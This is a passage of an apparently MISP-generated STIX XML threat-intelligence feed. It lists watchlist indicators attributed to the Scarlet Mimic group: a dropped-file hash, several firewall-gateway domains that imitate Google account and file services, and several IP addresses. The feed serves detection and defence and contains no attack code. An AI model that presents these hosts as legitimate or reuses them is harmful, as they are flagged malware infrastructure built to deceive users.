<stixCommon:Indicator id=":indicator-5824e149-ba7c-4e04-b905-69fe8e96ca05" timestamp="2016-11-10T16:06:17+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Artifacts dropped: ea45265fe98b25e719d5a9cc3b412d66 (MISP Attribute #1873)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Artifacts dropped: ea45265fe98b25e719d5a9cc3b412d66 (MISP Attribute #1873)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-5824e149-ba7c-4e04-b905-69fe8e96ca05">
<cybox:Object id=":File-5824e149-ba7c-4e04-b905-69fe8e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">ea45265fe98b25e719d5a9cc3b412d66</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:06:17+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Attribution</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-5824e1e5-e340-40b0-b3fa-69fe8e96ca05" timestamp="2016-11-10T16:08:53+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Attribution: Scarlet Mimic (MISP Attribute #1874)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Description>Attribution: Scarlet Mimic (MISP Attribute #1874)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:08:53+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">None</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-6308d2e1-a83a-44b2-b96f-267bc24efbd1" timestamp="2016-11-10T16:07:04+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: filegoogle.firewall-gateway.com (MISP Attribute #499)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: filegoogle.firewall-gateway.com (MISP Attribute #499)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-6308d2e1-a83a-44b2-b96f-267bc24efbd1">
<cybox:Object id=":DomainName-6308d2e1-a83a-44b2-b96f-267bc24efbd1">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">filegoogle.firewall-gateway.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:07:04+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-26fb914b-1601-4049-a8b5-c9afc3a16bc0" timestamp="2016-11-10T16:07:11+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: accountgoogle.firewall-gateway.com (MISP Attribute #500)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: accountgoogle.firewall-gateway.com (MISP Attribute #500)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-26fb914b-1601-4049-a8b5-c9afc3a16bc0">
<cybox:Object id=":DomainName-26fb914b-1601-4049-a8b5-c9afc3a16bc0">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">accountgoogle.firewall-gateway.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:07:11+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-11cf9c54-4d35-4a58-8128-a1076025ff25" timestamp="2016-11-10T16:06:49+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: sys.firewall-gateway.net (MISP Attribute #501)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: sys.firewall-gateway.net (MISP Attribute #501)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-11cf9c54-4d35-4a58-8128-a1076025ff25">
<cybox:Object id=":DomainName-11cf9c54-4d35-4a58-8128-a1076025ff25">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">sys.firewall-gateway.net</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:06:49+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-73e5412a-1252-495d-956d-28cfdd8edaed" timestamp="2016-11-10T16:04:39+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: news.firewall-gateway.com (MISP Attribute #502)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: news.firewall-gateway.com (MISP Attribute #502)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-73e5412a-1252-495d-956d-28cfdd8edaed">
<cybox:Object id=":DomainName-73e5412a-1252-495d-956d-28cfdd8edaed">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">news.firewall-gateway.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:04:39+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-ebbe87e2-7f84-4f68-b766-f63820da7966" timestamp="2016-11-10T16:09:17+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: accountsgoogle.firewall-gateway.com (MISP Attribute #503)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: accountsgoogle.firewall-gateway.com (MISP Attribute #503)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-ebbe87e2-7f84-4f68-b766-f63820da7966">
<cybox:Object id=":DomainName-ebbe87e2-7f84-4f68-b766-f63820da7966">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">accountsgoogle.firewall-gateway.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:09:17+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-3baf841e-c377-44ba-ba20-dcfd7aa8ba22" timestamp="2016-11-10T16:09:27+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: accounts-google.firewall-gateway.com (MISP Attribute #504)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: accounts-google.firewall-gateway.com (MISP Attribute #504)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-3baf841e-c377-44ba-ba20-dcfd7aa8ba22">
<cybox:Object id=":DomainName-3baf841e-c377-44ba-ba20-dcfd7aa8ba22">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">accounts-google.firewall-gateway.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:09:27+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-40edc447-3aaa-4f79-8268-16eddff19b33" timestamp="2016-11-10T16:09:38+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: accountsgoogles.firewall-gateway.com (MISP Attribute #505)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: accountsgoogles.firewall-gateway.com (MISP Attribute #505)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-40edc447-3aaa-4f79-8268-16eddff19b33">
<cybox:Object id=":DomainName-40edc447-3aaa-4f79-8268-16eddff19b33">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">accountsgoogles.firewall-gateway.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:09:38+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-b84e33b7-1958-4507-b7bb-6bb63304842c" timestamp="2016-11-10T16:09:47+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: googlefile.firewall-gateway.net (MISP Attribute #506)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: googlefile.firewall-gateway.net (MISP Attribute #506)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-b84e33b7-1958-4507-b7bb-6bb63304842c">
<cybox:Object id=":DomainName-b84e33b7-1958-4507-b7bb-6bb63304842c">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">googlefile.firewall-gateway.net</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:09:47+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-228f765c-d5ab-4fcf-a190-775b9ed2ad70" timestamp="2016-11-10T16:09:57+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: firewallupdate.firewall-gateway.com (MISP Attribute #507)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: firewallupdate.firewall-gateway.com (MISP Attribute #507)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-228f765c-d5ab-4fcf-a190-775b9ed2ad70">
<cybox:Object id=":DomainName-228f765c-d5ab-4fcf-a190-775b9ed2ad70">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">firewallupdate.firewall-gateway.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:09:57+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-35a7486a-38a7-4d3a-bdd8-1284d464484b" timestamp="2016-11-10T16:10:06+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: firewallupdate.firewall-gateway.net (MISP Attribute #508)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: firewallupdate.firewall-gateway.net (MISP Attribute #508)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-35a7486a-38a7-4d3a-bdd8-1284d464484b">
<cybox:Object id=":DomainName-35a7486a-38a7-4d3a-bdd8-1284d464484b">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">firewallupdate.firewall-gateway.net</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:10:06+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-8b0a371b-0c73-455d-a7ae-d0a530f23b04" timestamp="2016-11-10T16:10:18+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: drivgoogle.firewall-gateway.com (MISP Attribute #509)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: drivgoogle.firewall-gateway.com (MISP Attribute #509)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-8b0a371b-0c73-455d-a7ae-d0a530f23b04">
<cybox:Object id=":DomainName-8b0a371b-0c73-455d-a7ae-d0a530f23b04">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">drivgoogle.firewall-gateway.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:10:18+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-86627daf-07c8-467f-babc-426d586e7d4a" timestamp="2016-11-10T16:05:44+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: detail43.myfirewall.org (MISP Attribute #510)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: detail43.myfirewall.org (MISP Attribute #510)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-86627daf-07c8-467f-babc-426d586e7d4a">
<cybox:Object id=":DomainName-86627daf-07c8-467f-babc-426d586e7d4a">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">detail43.myfirewall.org</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:05:44+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-a31a03ec-f99e-4bec-95dc-3574c3512217" timestamp="2016-11-10T16:11:07+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 95.154.195.159 (MISP Attribute #512)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 95.154.195.159 (MISP Attribute #512)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-a31a03ec-f99e-4bec-95dc-3574c3512217">
<cybox:Object id=":Address-a31a03ec-f99e-4bec-95dc-3574c3512217">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">95.154.195.159</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:11:07+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-318dd748-c9d9-4f7b-9b42-75a60001f9e1" timestamp="2016-11-10T16:11:12+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 95.154.195.171 (MISP Attribute #513)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 95.154.195.171 (MISP Attribute #513)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-318dd748-c9d9-4f7b-9b42-75a60001f9e1">
<cybox:Object id=":Address-318dd748-c9d9-4f7b-9b42-75a60001f9e1">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">95.154.195.171</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:11:12+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-1f0bc371-f681-4049-855d-235e6bc5eb8e" timestamp="2016-11-10T16:11:20+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 5.54.19.17 (MISP Attribute #514)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 5.54.19.17 (MISP Attribute #514)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-1f0bc371-f681-4049-855d-235e6bc5eb8e">
<cybox:Object id=":Address-1f0bc371-f681-4049-855d-235e6bc5eb8e">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">5.54.19.17</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:11:20+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-f48470fd-c782-4831-a20d-4704b62f1358" timestamp="2016-11-10T16:12:49+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 78.129.252.159 (MISP Attribute #515)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 78.129.252.159 (MISP Attribute #515)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-f48470fd-c782-4831-a20d-4704b62f1358">
<cybox:Object id=":Address-f48470fd-c782-4831-a20d-4704b62f1358">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">78.129.252.159</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:12:49+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-c379b263-55d3-464d-b94f-178f02f883a8" timestamp="2016-11-10T16:12:57+00:00" xsi:type='indicator:IndicatorType'>
